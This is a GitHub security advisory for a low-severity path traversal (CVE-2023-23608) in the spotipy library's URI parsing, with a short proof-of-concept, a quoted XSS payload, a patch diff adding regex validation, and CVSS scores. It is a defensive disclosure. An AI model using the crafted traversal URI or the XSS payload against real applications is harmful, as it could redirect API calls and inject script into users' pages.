Skip to content

Path traversal vulnerability that may lead to type confusion in URI handling code

Low
stephanebruckert published GHSA-q764-g6fm-555v Jan 23, 2023

Package

pip spotipy (pip)

Affected versions

<=2.22.0

Patched versions

2.22.1

Description

Summary

If a malicious URI is passed to the library, the library can be tricked into performing an operation on a different API endpoint than intended.

Details

The code Spotipy uses to parse URIs and URLs accepts user data too liberally which allows a malicious user to insert arbitrary characters into the path that is used for API requests. Because it is possible to include .., an attacker can redirect for example a track lookup via spotifyApi.track() to an arbitrary API endpoint like playlists, but this is possible for other endpoints as well.

Before the security advisory feature was enabled on GitHub, I was already in contact with Stéphane Bruckert via e-mail, and he asked me to look into a potential fix.

My recommendation is to perform stricter parsing of URLs and URIs, which I implemented in the patch included at the end of the report. If you prefer, I can also invite you to a private fork of the repository.

PoC

The POC expects SPOTIFY_CLIENT_ID and SPOTIFY_CLIENT_SECRET environment variables to be set to authenticate against the API.

import spotipy
from spotipy.oauth2 import SpotifyClientCredentials


def main():
    spotifyApi = spotipy.Spotify(client_credentials_manager=SpotifyClientCredentials())

    # This URL contains the example playlist ID from the spotify docs, a malicious
    # playlist could instead contain a XSS payload in their title. A playlist with 
    # such a title was also included in the initial report via mail to maintainer.
    malicious_spotify_url = 'spotify:track:../playlists/3cEYpjA9oz9GiPac4AsH4n'
    

    # Usage of the track function, expecting to get a non-user-controllable track name
    # e.g. for displaying in a website.
    # Our modified track uri however makes the library return the name of a playlist which
    # may be created by anyone containing anything.
    track = spotifyApi.track(malicious_spotify_url)

    # Prints:
    # 'Name of the track: Spotify Web API Testing playlist'
    # A malicious playlist could also have an XSS payload as title, which would result in:
    # 'Name of the track: <img src=x onerror=prompt(1)>'
    print(f"Name of the track: {track['name']}")

if __name__ == '__main__':
    main()

Impact

The impact of this vulnerability depends heavily on what operations a client application performs when it handles a URI from a user and how it uses the responses it receives from the API.

Possible Patch

Caviats of this patch

  • The ID parsing functionality now newly raises ValueError if it cannot parse an ID, instead of logging a warning or silently passing back whatever it received as input.
    • WARNING I only adjusted unit tests to expect ValueError that didn't require a valid user session, other tests may also need adjustment
  • Unfortunately, I could not find conclusive documentation on what constitutes a valid Spotify username, but apparently some exist that contain alphanumeric characters, mine just contains numbers and the ones of newly created accounts seem to follow the base-62 scheme. You as developers probably have deeper insight into this, otherwise it probably will have to be discovered via bug reports if additional characters are valid as well.
From 30cf29b16e893dcac974dbd7481fb58a073b853c Mon Sep 17 00:00:00 2001
From: Shaderbug <119610832+Shaderbug@users.noreply.github.com>
Date: Tue, 10 Jan 2023 19:26:18 +0100
Subject: [PATCH] Improve URL and URI handling

---
 spotipy/client.py                            | 61 +++++++++++++++-----
 tests/integration/non_user_endpoints/test.py |  6 +-
 2 files changed, 49 insertions(+), 18 deletions(-)

diff --git a/spotipy/client.py b/spotipy/client.py
index d7025a9..b094947 100644
--- a/spotipy/client.py
+++ b/spotipy/client.py
@@ -6,6 +6,7 @@ __all__ = ["Spotify", "SpotifyException"]
 
 import json
 import logging
+import re
 import warnings
 
 import requests
@@ -96,6 +97,29 @@ class Spotify(object):
         "US",
         "UY"]
 
+    # Spotify URI scheme defined in [1], and the ID format as base-62 in [2].
+    #
+    # Unfortunately the IANA specification is out of date and doesn't include the new types
+    # show and episode. Additionally, for the user URI, it does not specify which characters
+    # are valid for usernames, so the assumption is alphanumeric which coincidentially are also
+    # the same ones base-62 uses.
+    # In limited manual exploration this seems to hold true, as newly accounts are assigned an
+    # identifier that looks like the base-62 of all other IDs, but some older accounts only have
+    # numbers and even older ones seemed to have been allowed to freely pick this name.
+    #
+    # [1] https://www.iana.org/assignments/uri-schemes/prov/spotify
+    # [2] https://developer.spotify.com/documentation/web-api/#spotify-uris-and-ids
+    _regex_spotify_uri = r'^spotify:(?P<type>track|artist|album|playlist|show|episode|user):(?P<id>[0-9A-Za-z]+)$'
+
+    # Spotify URLs are defined at [1]. The assumption is made that they are all
+    # pointing to open.spotify.com, so a regex is used to parse them as well,
+    # instead of a more complex URL parsing function.
+    #
+    # [1] https://developer.spotify.com/documentation/web-api/#spotify-uris-and-ids
+    _regex_spotify_url = r'^(http[s]?:\/\/)?open.spotify.com\/(?P<type>track|artist|album|playlist|show|episode|user)\/(?P<id>[0-9A-Za-z]+)(\?.*)?$'
+
+    _regex_base62 = r'^[0-9A-Za-z]+$'
+
     def __init__(
         self,
         auth=None,
@@ -1940,20 +1964,27 @@ class Spotify(object):
         return path
 
     def _get_id(self, type, id):
-        fields = id.split(":")
-        if len(fields) >= 3:
-            if type != fields[-2]:
-                logger.warning('Expected id of type %s but found type %s %s',
-                               type, fields[-2], id)
-            return fields[-1].split("?")[0]
-        fields = id.split("/")
-        if len(fields) >= 3:
-            itype = fields[-2]
-            if type != itype:
-                logger.warning('Expected id of type %s but found type %s %s',
-                               type, itype, id)
-            return fields[-1].split("?")[0]
-        return id
+        uri_match = re.search(Spotify._regex_spotify_uri, id)
+        if uri_match is not None:
+            uri_match_groups = uri_match.groupdict()
+            if uri_match_groups['type'] != type:
+                raise ValueError("Unexpected Spotify URI type.")
+            else:
+                return uri_match_groups['id']
+
+        url_match = re.search(Spotify._regex_spotify_url, id)
+        if url_match is not None:
+            url_match_groups = url_match.groupdict()
+            if url_match_groups['type'] != type:
+                raise ValueError("Unexpected Spotify URL type.")
+            else:
+                return url_match_groups['id']
+
+        # Raw identifiers might be passed, ensure they are also base-62
+        if re.search(Spotify._regex_base62, id) is not None:
+            return id
+
+        raise ValueError("Unsupported URL / URI")
 
     def _get_uri(self, type, id):
         if self._is_uri(id):
@@ -1962,7 +1993,7 @@ class Spotify(object):
             return "spotify:" + type + ":" + self._get_id(type, id)
 
     def _is_uri(self, uri):
-        return uri.startswith("spotify:") and len(uri.split(':')) == 3
+        return re.search(Spotify._regex_spotify_uri, uri) is not None
 
     def _search_multiple_markets(self, q, limit, offset, type, markets, total):
         if total and limit > total:
diff --git a/tests/integration/non_user_endpoints/test.py b/tests/integration/non_user_endpoints/test.py
index 96ee4da..116e1d9 100644
--- a/tests/integration/non_user_endpoints/test.py
+++ b/tests/integration/non_user_endpoints/test.py
@@ -280,7 +280,7 @@ class AuthTestSpotipy(unittest.TestCase):
         try:
             self.spotify.track(self.bad_id)
             self.assertTrue(False)
-        except SpotifyException:
+        except ValueError:
             self.assertTrue(True)
 
     def test_show_urn(self):
@@ -296,7 +296,7 @@ class AuthTestSpotipy(unittest.TestCase):
         self.assertTrue(show['name'] == 'Heavyweight')
 
     def test_show_bad_urn(self):
-        with self.assertRaises(SpotifyException):
+        with self.assertRaises(ValueError):
             self.spotify.show("bogus_urn", market="US")
 
     def test_shows(self):
@@ -333,7 +333,7 @@ class AuthTestSpotipy(unittest.TestCase):
         self.assertTrue(episode['name'] == '#1 Buzz')
 
     def test_episode_bad_urn(self):
-        with self.assertRaises(SpotifyException):
+        with self.assertRaises(ValueError):
             self.spotify.episode("bogus_urn", market="US")
 
     def test_episodes(self):
-- 
2.34.1

Severity

Low

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:N

CVE ID

CVE-2023-23608

Credits